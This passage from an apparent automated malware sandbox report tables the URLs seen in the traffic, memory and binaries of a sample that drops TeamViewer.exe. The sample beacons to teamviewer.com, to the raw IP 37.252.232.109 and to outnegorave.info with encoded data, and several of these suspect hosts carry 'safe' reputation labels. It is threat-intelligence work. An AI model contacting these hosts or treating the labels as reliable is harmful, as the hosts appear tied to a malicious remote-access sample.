        http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ==false
          		high
          http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002false
          • Avira URL Cloud: safe
          		unknown
          http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGatefalse
          • Avira URL Cloud: safe
          		unknown
          https://outnegorave.info/B8C631A8/false
          • Avira URL Cloud: safe
          		unknown
          http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002false
            		high
            http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001false
              		high
              http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001false
                		high
                http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCipfalse
                  		high
                  http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002false
                    		high
                    http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGatefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFBfalse
                      		high
                      http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002false
                        		high
                        http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdrfalse
                          		high
                          http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://37.252.232.109/TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mastr1.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=19TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                              		high
                              http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                		high
                                https://outnegorave.info/6TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.teamviewer.com/help/support.aspxK77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                    		high
                                    https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campaiTeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001hTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://ocsp.sectigo.com077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://corp.roblox.com/contact/svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                          		high
                                          http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZTeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412076158.0000000005766000.00000004.00000001.sdmpfalse
                                            		high
                                            http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate2TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                              		high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001tTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                		high
                                                http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.TeamViewer.com/help77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                    		high
                                                    http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001pTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://mastr1.teamviewer.com/din.aspx?s=3272978&client=DynGate&p=1000TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.TeamViewer.com/download77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                            		high
                                                            http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001JTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.TeamViewer.comTeamViewer.exe, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpfalse
                                                                		high
                                                                http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001BTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001sTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001qTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://outnegorave.info/TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.TeamViewer.com#http://www.TeamViewer.com/licensing77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                    		high
                                                                    http://www.teamviewer.com/ja/company/shutdown.aspx?version=TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://en.help.roblox.com/hc/en-ussvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001lTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001XTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGatePTeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001PIxTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://outnegorave.info/8C631A8/TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://go.teamviewer.comn077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://outnegorave.info/B8C631A8/70TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventuresvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001oTeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.teamviewer.com/help/connectivity.aspx:77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                  		high
                                                                                  https://sectigo.com/CPS077Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.teamviewer.com/favicon.ico77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                    		high
                                                                                    https://www.roblox.com/developsvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQSTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.415730284.000000000576A000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://outnegorave.info/allControlPanel.dllTeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://crl.ver)svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749228779.00000282E9C16000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://nsis.sf.net/NSIS_ErrorError77Etc0bR2v.exefalse
                                                                                          		high
                                                                                          https://corp.roblox.com/parents/svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.teamviewer.com/download/beta.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                              		high
                                                                                              http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                		high
                                                                                                http://www.teamviewer.comTeamviewer_Resource_ja.dll.1.drfalse
                                                                                                  		high
                                                                                                  http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.teamviewer.com/licensing/commercialuse.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                    		high
                                                                                                    http://nsis.sf.net/NSIS_Error77Etc0bR2v.exefalse
                                                                                                      		high
                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://outnegorave.info/B8C631A8/87096&p=10000001TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTTeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://outnegorave.info/B8C631A8/sTeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.roblox.com/info/privacysvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.g5e.com/termsofservicesvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.teamviewer.com/company/index.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                              		high
                                                                                                              http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                		high
                                                                                                                http://www.teamviewer.com/ja/company/shutdown.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                  		high
                                                                                                                  https://outnegorave.info/B8C631A8/xTeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateYTeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001lTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://37.252.232.109/32172969&client=DynGate&p=10000002vTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.teamviewer.com/ja/licensing/commercialuse.aspxTeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.teamviewer.com/licensing/order.aspx?lng=ja77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                      		high

                                                                                                                      Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      185.188.32.1
